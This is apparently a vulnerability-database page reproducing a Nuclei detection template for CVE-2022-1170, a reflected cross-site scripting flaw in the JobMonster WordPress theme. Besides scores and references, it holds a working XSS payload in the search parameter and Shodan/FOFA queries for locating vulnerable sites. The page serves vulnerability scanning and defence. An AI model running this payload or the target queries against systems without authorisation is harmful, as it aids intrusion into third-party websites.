Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-1170
HistoryNov 16, 2023 - 11:37 a.m.

JobMonster < 4.5.2.9 - Cross-Site Scripting

2023-11-1611:37:56
ProjectDiscovery
github.com
8
cve
cve2022
wpscan
wp-theme
wordpress
xss
jobmonster
nootheme
cross-site scripting

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.6%

In the theme JobMonster &lt; 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.
id: CVE-2022-1170

info:
  name: JobMonster < 4.5.2.9 - Cross-Site Scripting
  author: Akincibor,ritikchaddha
  severity: medium
  description: |
    In the theme JobMonster < 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.
  reference:
    - https://wpscan.com/vulnerability/2ecb18e6-b575-4a20-bd31-94d24f1d1efc
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1170
    - https://themeforest.net/item/jobmonster-job-board-wordpress-theme/10965446
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1170
    cwe-id: CWE-79
    epss-score: 0.001
    epss-percentile: 0.40139
    cpe: cpe:2.3:a:nootheme:jobmonster:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nootheme
    product: jobmonster
    framework: wordpress
    shodan-query: http.html:/wp-content/themes/noo-jobmonster
    fofa-query: body=/wp-content/themes/noo-jobmonster
    publicwww-query: "/wp-content/themes/noo-jobmonster"
  tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme

http:
  - method: GET
    path:
      - '{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - 'noo-resume'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100949b3fb8fffb7c411e47099d898af9ad0cc885e111ca45d1760d8fc75b5c4a34022100d8bd6d1d525d26e41b602d4d62aed8b8b337c5e779950ffb4c5394415d64aea0:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

41.6%

Related for NUCLEI:CVE-2022-1170